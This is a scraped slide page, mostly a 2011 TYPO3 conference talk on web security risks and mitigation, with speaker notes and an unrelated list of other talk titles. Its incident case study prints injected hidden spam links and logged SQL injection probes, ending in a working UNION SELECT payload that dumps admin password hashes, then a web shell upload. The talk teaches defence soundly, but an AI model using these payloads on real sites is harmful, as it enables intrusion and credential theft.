DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfMounikaPolabathina
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionDilum Bandara
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxLoriGlavin3
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.Curtis Poe
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxLoriGlavin3
 

Último (20)

Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptxUse of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
Use of FIDO in the Payments and Identity Landscape: FIDO Paris Seminar.pptx
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: Loan Stars - Tech Forum 2024
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine Tuning
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
What is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdfWhat is DBT - The Ultimate Data Build Tool.pdf
What is DBT - The Ultimate Data Build Tool.pdf
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
DMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special EditionDMCC Future of Trade Web3 - Special Edition
DMCC Future of Trade Web3 - Special Edition
 
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptxDigital Identity is Under Attack: FIDO Paris Seminar.pptx
Digital Identity is Under Attack: FIDO Paris Seminar.pptx
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.How AI, OpenAI, and ChatGPT impact business and software.
How AI, OpenAI, and ChatGPT impact business and software.
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
The State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptxThe State of Passkeys with FIDO Alliance.pptx
The State of Passkeys with FIDO Alliance.pptx
 

TYPO Security - Risks and Mitigation of a TYPO3 Site Security Breach

  • 1. TYPO3 Conference - San Francisco 2011 Inspiring TYPO Security - Risks and Mitigation sha
  • 2. T3CON11 San Francisco TYPO Security - Risks and Mitigation 10.06.2011 Helmut Hummel <helmut.hummel@typo3.org>
  • 3. Introduction About me Involved in TYPO3 project since 2005 Member of the TYPO3 Security Team since 2008 TYPO3 Security Team Leader since 2009 TYPO3 Core Team Member since 2011 Employed at naw.info in Hannover, Germany Twitter: helhum Blog: http://www.naw.info/blogs/typo3security/ Inspiring people to TYPO Security - Risks and Mitigation share
  • 4. TYPO Security - Risks and Mitigation Agenda What is Security? General Security Concepts Attack Vectors Knowing the Enemy: A Case Story Mitigation TYPO3 Security Team Inspiring people to TYPO Security - Risks and Mitigation share
  • 5. What is Security? Inspiring people to TYPO Security - Risks and Mitigation share
  • 6. Is TYPO3 secure? Is my TYPO3 Site secure? Inspiring people to TYPO Security - Risks and Mitigation share
  • 7. What is Security? Criteria for Security Inspiring people to TYPO Security - Risks and Mitigation share
  • 8. What is Security? Criteria for Security Privacy Inspiring people to TYPO Security - Risks and Mitigation share
  • 9. What is Security? Criteria for Security Privacy Integrity and Property Inspiring people to TYPO Security - Risks and Mitigation share
  • 10. What is Security? Criteria for Security Privacy Integrity and Property Availability and Intentional Use Inspiring people to TYPO Security - Risks and Mitigation share
  • 11. Security is a process, not a product. (Bruce Schneier) Inspiring people to TYPO Security - Risks and Mitigation share
  • 12. What is Security? Security is a process Inspiring people to TYPO Security - Risks and Mitigation share
  • 13. What is Security? Security is a process Care taking and improvements over time Inspiring people to TYPO Security - Risks and Mitigation share
  • 14. What is Security? Security is a process Care taking and improvements over time Depending on your needs Inspiring people to TYPO Security - Risks and Mitigation share
  • 15. What is Security? Security is a process Care taking and improvements over time Depending on your needs Nothing is secure! Something can only be not insecure at a particular time Inspiring people to TYPO Security - Risks and Mitigation share
  • 16. What is Security? Why TYPO3 can be considered to be not insecure Inspiring people to TYPO Security - Risks and Mitigation share
  • 17. What is Security? Why TYPO3 can be considered to be not insecure TYPO3 Security Team takes care Inspiring people to TYPO Security - Risks and Mitigation share
  • 18. What is Security? Why TYPO3 can be considered to be not insecure TYPO3 Security Team takes care Highly customizable for your needs Inspiring people to TYPO Security - Risks and Mitigation share
  • 19. What is Security? Why TYPO3 can be considered to be not insecure TYPO3 Security Team takes care Highly customizable for your needs Few critical Security issues over time Inspiring people to TYPO Security - Risks and Mitigation share
  • 20. General Security Concepts Inspiring people to TYPO Security - Risks and Mitigation share
  • 21. General Security Concepts General Security Concepts Inspiring people to TYPO Security - Risks and Mitigation share
  • 22. General Security Concepts General Security Concepts Defense in depth Inspiring people to TYPO Security - Risks and Mitigation share
  • 23. General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people to TYPO Security - Risks and Mitigation share
  • 24. General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Inspiring people to TYPO Security - Risks and Mitigation share
  • 25. General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Inspiring people to TYPO Security - Risks and Mitigation share
  • 26. General Security Concepts General Security Concepts Defense in depth Minimize Exposure / Least privilege Do not rely on security by obscurity Log Activities Inspiring people to TYPO Security - Risks and Mitigation share
  • 27. Attack Vectors Inspiring people to TYPO Security - Risks and Mitigation share
  • 28. Attack Vectors Attack Vectors Inspiring people to TYPO Security - Risks and Mitigation share
  • 29. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Inspiring people to TYPO Security - Risks and Mitigation share
  • 30. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Inspiring people to TYPO Security - Risks and Mitigation share
  • 31. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Inspiring people to TYPO Security - Risks and Mitigation share
  • 32. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Inspiring people to TYPO Security - Risks and Mitigation share
  • 33. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Inspiring people to TYPO Security - Risks and Mitigation share
  • 34. Attack Vectors Attack Vectors Security Issues in outdated TYPO3 Versions Security Issues in (outdated) TYPO3 Extensions Security Issues in TypoScript Simple paswords Compromised PC with FTP access Other Software on the webserver Inspiring people to TYPO Security - Risks and Mitigation share
  • 35. Knowing the Enemy Inspiring people to TYPO Security - Risks and Mitigation share
  • 36. Knowing the Enemy The incident, how did it happen? <div style="display:none;"><a href="http://totiyaso.tripod.com/jovian-v251-for-palmos- crack.html">Jovian v2.5.1 for PalmOS Crack</a> <a href="http://tarajoz.tripod.com/clickomania-21-for- palmos-crack.html">Clickomania 2.1 for PalmOS Crack</a> <a href="http://mujaciya.tripod.com/ ollydbg-110-xp-crack.html">OllyDbg 1.10 XP Crack</a> <a href="http://loyobusi.tripod.com/infograph- infocad-v651b-crack.html">InfoGraph InfoCAD v6.51b Crack</a> <a href="http://nisexufo.tripod.com/ customizer-xp-v15-by-tnt-crack.html">Customizer XP v1.5 by TNT Crack</a> <a href="http:// yajegoco.tripod.com/gw3dfeatures-for-solidworks-v5-crack.html">GW3Dfeatures For SolidWorks v5 Crack</ a> <a href="http://lebuvoxo.tripod.com/regrun-ii-v291-crack.html">RegRun II v2.91 Crack</a> <a href="http://ziziquy.tripod.com/stuffit-standard-v852165-crack.html">StuffIt Standard v8.5.2.165 Crack</a> <a href="http://ziziquy.tripod.com/glu3d-v1308-for-3dsmax-7-crack.html">Glu3D v1.3.08 for 3dsmax 7 Crack</a> <a href="http://yucayibu.tripod.com/cpukiller-v20-serial-by-tnt- crack.html">CPUKILLER v2.0 Serial by TNT Crack</a> <a href="http://fimegipo.tripod.com/microangelo- v55-by-aaocg-crack.html">Microangelo v5.5 by AAOCG Crack</a> <a href="http://loyobusi.tripod.com/ restoreit-deluxe-edition-v301-crack.html">RestoreIT! Deluxe Edition v3.01 Crack</a> <a href="http:// tomuxeq.tripod.com/abbyy-scanto-office-v10-crack.html">ABBYY ScanTo Office v1.0 Crack</a> <a href="http://besiluho.tripod.com/anno-domini-2002-v106-build-1-crack.html">Anno Domini 2002 v1.06 build 1 Crack</a> <a href="http://yepimal.tripod.com/serious-sam-2-plus-5-trainer-crack.html">SERIOUS SAM 2 PLUS 5 TRAINER Crack</a> <a href="http://vihuseya.tripod.com/pe-corrector-v166-by-fff- crack.html">PE Corrector v1.66 by FFF Crack</a> <a href="http://tarajoz.tripod.com/teenswebbrowser- bounce-10-crack.html">teensWebBrowser Bounce 1.0 Crack</a> <a href="http://loyobusi.tripod.com/bb- password-manager-v1011-crack.html">BB Password Manager v1.0.1.1 Crack</a> <a href="http:// reyabade.tripod.com/calendar-wizard-v2014a-crack.html">Calendar Wizard v2.0.14a Crack</a> <a href="http://gezuvak.tripod.com/1-act-personal-firewall-2006-crack.html">1-ACT Personal Firewall 2006 Crack</a> <a href="http://fimegipo.tripod.com/system-locker-112f-by-dbc-crack.html">System Locker 1.12f by DBC Crack</a> <a href="http://sehuxogo.tripod.com/nidesoft-dvd-ripper-v3062- crack.html">Nidesoft DVD Ripper v3.0.62 Crack</a> <a href="http://ziziquy.tripod.com/clonecd-v4331-by- tsrh-crack.html">CloneCD v4.3.3.1 by TSRH Crack</a> <a href="http://tihuqap.tripod.com/icon-sucker-2- pro-210072-crack.html">Icon Sucker 2 Pro 2.10.072 Crack</a> <a href="http://coqoxole.tripod.com/ primasoft-internet-optimizer-crack.html">PrimaSoft Internet Optimizer Crack</a> <a href="http:// fimegipo.tripod.com/fairstars-recorder-v201-crack.html">FairStars Recorder v2.01 Crack</a> <a href="http://nekuqoj.tripod.com/email-validation-for-net-v20crack.html">Email Validation for NET v2.0Crack</a> <a href="http://xocedeqi.tripod.com/mathworks-matlab-r2006b-3-cds-crack.html">Mathworks Matlab R2006b (3 cds) Crack</a> <a Inspiring people to TYPO Security - Risks and Mitigation share
  • 37. Knowing the Enemy Searching for vulnerabilities 178.122.0.0 - - [17/Dec/2010:14:01:43 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93' HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people to TYPO Security - Risks and Mitigation share
  • 38. Knowing the Enemy Searching for vulnerabilities 178.122.0.0 - - [17/Dec/2010:14:02:30 +0100] "GET http://www.example.com/glossary/?tx_a21glossary%5Buid%5D=93+union+select +1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29, 30,31,32,33+--+ HTTP/1.1" 200 54383 "-" "Opera/9.80 (Windows NT 5.1; U; ru) Presto/2.6.30 Version/10.63" Inspiring people to TYPO Security - Risks and Mitigation share
  • 39. Knowing the Enemy Searching for vulnerabilities 14:03:09: tx_galleryexample_pi2[uid]=1192&tx_galleryexample_pi2[year]=2010 Inspiring people to TYPO Security - Risks and Mitigation share
  • 40. Knowing the Enemy Searching for vulnerabilities 14:03:21: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010' Inspiring people to TYPO Security - Risks and Mitigation share
  • 41. Knowing the Enemy Searching for vulnerabilities 14:03:42: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 Inspiring people to TYPO Security - Risks and Mitigation share
  • 42. Knowing the Enemy Searching for vulnerabilities 14:04:15: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 -- Inspiring people to TYPO Security - Risks and Mitigation share
  • 43. Knowing the Enemy Found something! 14:04:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 order by 10 -- Inspiring people to TYPO Security - Risks and Mitigation share
  • 44. Knowing the Enemy Forging the exploit 14:08:38: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- Inspiring people to TYPO Security - Risks and Mitigation share
  • 45. Knowing the Enemy Exploit working! 14:09:04: tx_galleryexample_pi2[uid]=979'&tx_galleryexample_pi2[year]=-2010 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,group_concat(concat_ws(0x3a3a,user name,password,admin)),20,21,22 from be_users where admin=1 -- Now the hacker has the md5 hashes of all admin passwords Inspiring people to TYPO Security - Risks and Mitigation share
  • 46. Knowing the Enemy 15 minutes later: Log in as admin! 14:21:48: /typo3/index.php 14:21:50: /typo3/backend.php Inspiring people to TYPO Security - Risks and Mitigation share
  • 47. Knowing the Enemy Uploading web shell 14:22:32: /typo3conf/ext/t3quixplorer/mod1/index.php?action=upload&dir=/ typo3conf/ext/realurlmanagement/ 14:22:46: /typo3conf/ext/realurlmanagement/title.php You loose! Inspiring people to TYPO Security - Risks and Mitigation share
  • 48. Knowing the Enemy Conclusion Inspiring people to TYPO Security - Risks and Mitigation share
  • 49. Knowing the Enemy Conclusion Hackers know what they are doing Inspiring people to TYPO Security - Risks and Mitigation share
  • 50. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well Inspiring people to TYPO Security - Risks and Mitigation share
  • 51. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools Inspiring people to TYPO Security - Risks and Mitigation share
  • 52. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack Inspiring people to TYPO Security - Risks and Mitigation share
  • 53. Knowing the Enemy Conclusion Hackers know what they are doing They know TYPO3 very well They also use automated tools They often try to obfuscate the hack With automated attacks effort is low, gain is high Inspiring people to TYPO Security - Risks and Mitigation share
  • 54. Mitigation Inspiring people to TYPO Security - Risks and Mitigation share
  • 55. Mitiation Mandatory steps Inspiring people to TYPO Security - Risks and Mitigation share
  • 56. Mitiation Mandatory steps Monitor and Back Up your Website Inspiring people to TYPO Security - Risks and Mitigation share
  • 57. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Inspiring people to TYPO Security - Risks and Mitigation share
  • 58. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Inspiring people to TYPO Security - Risks and Mitigation share
  • 59. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Inspiring people to TYPO Security - Risks and Mitigation share
  • 60. Mitiation Mandatory steps Monitor and Back Up your Website Read the announce Mailing list and bulletins carefully Use up to date Software Use saltedpasswords and advise your admins (and users) to use non obvious passwords Make your Integrators aware of possible TypoScript problems Inspiring people to TYPO Security - Risks and Mitigation share
  • 61. Mitiation Advanced steps Inspiring people to TYPO Security - Risks and Mitigation share
  • 62. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Inspiring people to TYPO Security - Risks and Mitigation share
  • 63. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Inspiring people to TYPO Security - Risks and Mitigation share
  • 64. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Inspiring people to TYPO Security - Risks and Mitigation share
  • 65. Mitiation Advanced steps Use TYPO3 Core features in favour of extensions Use protected backend access Consider using mod_security Consider using phpids TYPO3 Extension Inspiring people to TYPO Security - Risks and Mitigation share
  • 66. TYPO3 Security Team Inspiring people to TYPO Security - Risks and Mitigation share
  • 67. TYPO3 Security Team Important things to know Inspiring people to TYPO Security - Risks and Mitigation share
  • 68. TYPO3 Security Team Important things to know Responsible Disclosure Policy Inspiring people to TYPO Security - Risks and Mitigation share
  • 69. TYPO3 Security Team Important things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Inspiring people to TYPO Security - Risks and Mitigation share
  • 70. TYPO3 Security Team Important things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only Inspiring people to TYPO Security - Risks and Mitigation share
  • 71. TYPO3 Security Team Important things to know Responsible Disclosure Policy One communication channel (security@typo3.org) Pre-Announcements for critical issues only You can support us Inspiring people to TYPO Security - Risks and Mitigation share
  • 72. TYPO Security - Risks and Mitigation Rescources PHP-Sicherheit (Christopher Kunz and Stefan Esser) Essential PHP Security (Chris Shiflett) http://www.owasp.org/ http://typo3.org/teams/security/security- bulletins/ http://typo3.org/teams/security/resources/ http://buzz.typo3.org/teams/security/ Inspiring people to TYPO Security - Risks and Mitigation share
  • 73. Questions? Inspiring people to TYPO Security - Risks and Mitigation share
  • 74. Thank You! Inspiring people to TYPO Security - Risks and Mitigation share
  • 75.

Notas do Editor

  1. 1\n2\n3\n4\n5\n6\n7\n
  2. \n
  3. \n
  4. Interrupt me immediatly if you have questions\n
  5. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\nWhy it is important to define?\n\n\n
  6. It depends ;)\n\n
  7. Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  8. Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  9. Private things are kept private\n* Walking in the house being naked\n* Customer data not exposed\nNothing can be stolen\n* Your TV is still there whe you return home and it is still working\n* Bank Accounts, Vouchers etc.\nNobody can use your &amp;#x201E;subject&amp;#x201C; for any other purpose than the one you intented\n* Nobody sleeps in your bed, uses your Internet Connections for commiting crime etc.\n* Website is running and does not display SPAM links on your website\n
  10. \n
  11. Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  12. Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  13. Caretaking: \n* Replace broken, not working locks, don&amp;#x2018;t use simple 3-number locks, even not for your oldest bike\n* As hackers and hacker tools and computing power evolve, so the security concepts have to\n* Established Security handling workflow\n\nYour needs:\n* Do you live in a small village in canada or in New York (special bike-lock)\n* Are you a Bank or just showing your gold fish breed on a website?\n* The security efforts must relate to the possible impact:\n* invest in resources taken for security / potential loss when hacked\n-&gt;If the effort to be hacked exceeds the gain\n Your system is secure\nNothing is secure by definition:\n* The security of an application must be proven over time\n\n\n
  14. Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  15. Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  16. Caretaking: \n* All issues handled by the Sec-Team. No 0-Day exploits so far, everything (core) has been reported beforehand to us\n* New Security features are beeing implemented (saltedpasswords, rsaauth)\n\nYour needs:\n* TYPO3 is highly customizable (login services, plugins etc.) \n* e.g. Health information platform: encrypted webservice data (password hash is key)\n\nFew critical Security issues over time\n* Handled fast and relyable by the sec team\n\n\n
  17. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  18. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  19. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  20. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  21. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  22. Defense in Depth:\n* Onion principle\n* fence, front door, curtains, bathroom/ bedroom doors, Password for your computer, Safe\n* (Physical access,) Firewall (network), OS, WAF, Webserver Apache, PHP (suhosin), Application (e.g. TYPO3)\n\nMinimize Exposure / Least privilege:\n* Activate only needed services (extensions) (OS, Apache, TYPO3) (turn off your Wifi when not at home)\n\nObscurity: \n* keys below the stone or above the door\n* e.g. alternate telnet port; Database export in document root with &amp;#x201E;secret&amp;#x201C; name\n\nLog:\n* Even helpful _after_ an incident\n* Cameras (Laptop theft software)\n* Apache and TYPO3 logs (keep them in a safe place (not writable by webserver/ php user) if possible\n\n
  23. \n
  24. \n
  25. \n
  26. \n
  27. \n
  28. \n
  29. \n
  30. \n
  31. \n
  32. \n
  33. \n
  34. \n
  35. \n
  36. \n
  37. \n
  38. \n
  39. \n
  40. \n
  41. \n
  42. \n
  43. Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  44. Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  45. Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  46. Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  47. Automated tools: \nLizaMoon\n\nObfuscate: \nGoogle conditional attack\n\nGain:\nEven &amp;#x201E;small websites&amp;#x201C; are targeted\n
  48. Web-Application Security, \nnot personal nor gouvernmental Security\nNevertheless there are similarities, which I use to explain\n\n\n
  49. Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
  50. Monitoring:\n* suspicious activity/ load on server\n\nUp to date Software\n* OS, PHP, TYPO3, Extensions\n\n\n
